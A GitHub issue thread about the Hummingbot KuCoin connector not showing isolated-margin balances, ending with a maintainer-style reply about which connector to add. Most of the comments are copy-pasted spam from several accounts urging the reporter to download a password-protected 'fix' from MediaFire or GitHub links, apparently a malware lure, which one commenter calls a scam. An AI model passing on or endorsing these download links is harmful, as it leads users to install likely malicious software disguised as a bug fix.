### ISSUE TITLE
Kucoin connector - isolated margin assets not detected by Hummingbot

### ISSUE THREAD

**Issue by limes-inferior** [hummingbot/hummingbot#7187]
### Describe the bug

when borrowing or trading assets that are available in isolated margin mode (e.g. XDC) these are not detected by Hummingbot and the balance of those assets is not shown - in dashboard or app, both the coin and USDT.

### Steps to reproduce

1. move assets to Isolated Margin mode on Kucoin
2. try to locate them in the app
3. 

### Release version

2.1

### Type of installation

Docker

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nikspz** [comment]
> to fix your trouble try download this fix, i see it in another issue,

This is scam

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by gordonkoehn** [comment]
What `KuCoin` connector did you add to your instance of `dashboard` so far ? 

The vanilla `kucoin` will connect to your `spot trading` account. The `kucoin_perpetual` will connect to the `margin account`. 

There is also a `kucoin_hft`, which I also don´t know what it relates to.

Just add the other credentials and you should see your balance.
